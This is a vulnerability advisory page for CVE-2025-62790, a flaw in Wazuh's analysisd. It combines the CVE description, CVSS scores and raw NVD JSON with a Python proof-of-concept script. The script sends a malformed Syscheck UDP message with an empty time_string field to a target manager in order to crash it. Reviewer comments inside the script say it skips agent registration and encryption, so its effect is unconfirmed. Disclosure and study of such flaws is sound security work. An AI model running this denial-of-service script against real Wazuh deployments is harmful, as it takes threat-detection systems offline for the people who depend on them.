Security Vulnerability Report
CVE-2025-62790 CVSS 7.5 HIGH

CVE-2025-62790

Published: 2025-10-29 17:15:37
Last Modified: 2025-11-03 19:34:23

Description

Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, fim_fetch_attributes_state() implementation does not check whether time_string is NULL or not before calling strlen() on it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE
Wazuh < 4.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-62790 PoC - Wazuh fim_fetch_attributes_state() NULL pointer dereference

Per the advisory text, versions of Wazuh before 4.11.0 call strlen() on
time_string in fim_fetch_attributes_state() without a NULL check, so a
malformed Syscheck message from an agent can crash analysisd
(availability impact only; fixed in 4.11.0).

This script builds one colon-separated Syscheck-style byte string and sends it
as a single UDP datagram to the given host/port.  Nothing in it performs agent
registration, key handling or message encryption, so whether the manager
actually parses the datagram as an agent event is not established by this code.
"""

import socket
import struct  # NOTE(review): imported but never used in this script
import hashlib


def generate_syscheck_message():
    """
    Build the Syscheck-style message used by this PoC.

    Returns:
        bytes: fourteen fixed fields joined with b":"; the last field
        (time_string) is the empty byte string.

    NOTE(review): the advisory names fim_fetch_attributes_state() as the
    affected function.  Also note that b"" is an empty string, not a NULL
    pointer; whether the manager's parser maps an empty trailing field to NULL
    is not shown here and would need to be confirmed against the Wazuh source.
    """
    # Assumed field layout (from the PoC author; not verified against the
    # Wazuh protocol on this page):
    # syscheck:timestamp:agent_id:filename:size:mtime:md5:sh256:uid:gid:gname:dname:attributes:time_string
    # The intent is to leave time_string empty.

    message_type = b"syscheck"
    timestamp = b"2025-01-15 10:30:00"
    agent_id = b"001"
    filename = b"/etc/passwd"
    size = b"1234"
    mtime = b"1705312200"
    # Placeholder digests of b"test"; their values are irrelevant to the crash path.
    md5 = hashlib.md5(b"test").hexdigest().encode()
    sha256 = hashlib.sha256(b"test").hexdigest().encode()
    uid = b"0"
    gid = b"0"
    gname = b"root"
    dname = b"root"
    attributes = b"r--r--r--"
    # Empty time_string field -- this is an empty byte string, not a NULL
    # pointer; see the docstring caveat above.
    time_string = b""

    # Join the fields with ':' into a single bytes object.
    message = b":".join([
        message_type, timestamp, agent_id, filename, size, mtime,
        md5, sha256, uid, gid, gname, dname, attributes, time_string
    ])

    return message


def send_exploit(target_host, target_port=1514):
    """
    Send the message from generate_syscheck_message() as one UDP datagram.

    Args:
        target_host: hostname or IP address passed to sendto().
        target_port: UDP port (default 1514).

    Returns:
        None.  Progress is printed to stdout; any exception is printed and
        swallowed rather than raised.

    NOTE(review): the original docstring stated that a registered agent key is
    required, but no key, registration or encryption step exists in this
    function -- the bytes are sent in the clear.  The closing print describes an
    expected outcome; the script does not observe or verify the manager's state.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        message = generate_syscheck_message()
        print(f"[*] Sending malicious Syscheck message to {target_host}:{target_port}")
        print(f"[*] Message length: {len(message)} bytes")
        print(f"[*] Message preview: {message[:100]}...")
        sock.sendto(message, (target_host, target_port))
        print("[+] Malicious message sent successfully")
        print("[*] The manager's analysisd process should crash due to NULL pointer dereference")
        # NOTE(review): close() is skipped if sendto() raises; a `with` block or
        # `finally` would release the socket on every path.
        sock.close()
    except Exception as e:
        # Broad catch: any failure (DNS, network, bad arguments) is reported
        # the same way and the process exits 0.
        print(f"[-] Error sending exploit: {e}")


if __name__ == "__main__":
    import sys
    # Usage: <target_ip> [port]; port defaults to 1514.  sys.argv[2] is passed
    # straight to int(), so a non-numeric port raises ValueError here.
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 1514
    send_exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62790", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:36.983", "lastModified": "2025-11-03T19:34:22.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, fim_fetch_attributes_state() implementation does not check whether time_string is NULL or not before calling strlen() on it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.11.0", "matchCriteriaId": "7EBF4F2E-C12A-401D-8408-287D9EC5B0B1"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-9xj3-vc52-48p9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}